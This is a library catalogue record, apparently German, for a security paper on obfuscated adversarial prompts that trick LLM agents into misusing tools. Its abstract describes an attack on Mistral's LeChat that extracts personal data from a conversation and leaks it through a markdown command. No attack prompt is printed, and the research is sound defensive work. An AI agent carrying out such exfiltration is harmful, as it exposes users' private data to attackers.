Imprompter: Tricking LLM Agents into Improper Tool Use
Large Language Model (LLM) Agents are an emerging computing paradigm that blends generative machine learning with tools such as code interpreters, web browsing, email, and more generally, external resources. These agent-based systems represent an emerging shift in personal computing. We contribute t...
Gespeichert in:
Hauptverfasser: | , , , , , , |
---|---|
Format: | Artikel |
Sprache: | eng |
Schlagworte: | |
Online-Zugang: | Volltext bestellen |
Tags: |
Tag hinzufügen
Keine Tags, Fügen Sie den ersten Tag hinzu!
|
Zusammenfassung: | Large Language Model (LLM) Agents are an emerging computing paradigm that
blends generative machine learning with tools such as code interpreters, web
browsing, email, and more generally, external resources. These agent-based
systems represent an emerging shift in personal computing. We contribute to the
security foundations of agent-based systems and surface a new class of
automatically computed obfuscated adversarial prompt attacks that violate the
confidentiality and integrity of user resources connected to an LLM agent. We
show how prompt optimization techniques can find such prompts automatically
given the weights of a model. We demonstrate that such attacks transfer to
production-level agents. For example, we show an information exfiltration
attack on Mistral's LeChat agent that analyzes a user's conversation, picks out
personally identifiable information, and formats it into a valid markdown
command that results in leaking that data to the attacker's server. This attack
shows a nearly 80% success rate in an end-to-end evaluation. We conduct a range
of experiments to characterize the efficacy of these attacks and find that they
reliably work on emerging agent-based systems like Mistral's LeChat, ChatGLM,
and Meta's Llama. These attacks are multimodal, and we show variants in the
text-only and image domains. |
---|---|
DOI: | 10.48550/arxiv.2410.14923 |